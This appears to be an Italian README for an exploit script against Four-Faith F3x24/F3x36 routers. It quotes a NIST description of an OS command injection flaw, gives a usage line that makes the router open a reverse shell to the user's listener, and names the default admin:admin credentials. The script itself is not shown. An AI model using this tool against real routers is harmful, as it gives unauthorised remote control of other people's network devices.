
Un exploit per router Four-Faith per ottenere una reverse shell.
Questo è un exploit per i router Four-Faith dei modelli F3x24 e F3x36 per ottenere una reverse shell.
"I router Four-Faith dei modelli F3x24 e F3x36 sono affetti da una vulnerabilità di injection di comandi del sistema operativo (OS). Almeno la versione del firmware 2.0 consente ad attaccanti autenticati e remoti di eseguire comandi OS arbitrari tramite HTTP quando si modifica l'ora di sistema tramite apply.cgi. Inoltre, questa versione del firmware ha credenziali predefinite che, se non modificate, trasformerebbero di fatto questa vulnerabilità in un problema di esecuzione di comandi OS remota e non autenticata."
Fonte: nist.gov
Questo script si basa su un payload osservato da VulnCheck
Prima di eseguire l'exploit, avvia un server TCP sulla tua macchina.
Poi esegui
python exploit.py [-u USERNAME] [-p PASSWORD] [-rport REMOTE_PORT] RHOST LHOST LPORT
Dove
RHOST è l'indirizzo IP remoto. Puoi anche aggiungere un dominio.LHOST è l'IP del tuo server TCP sulla tua macchina.LPORT è la porta del tuo server TCP.USERNAME e PASSWORD sono le credenziali del router. Il valore predefinito è admin:admin.RPORT è la porta remota del router. Il valore predefinito è 80.Assicurati di utilizzare questo exploit solo per test e in ambienti autorizzati.
Non usarlo mai per scopi dannosi.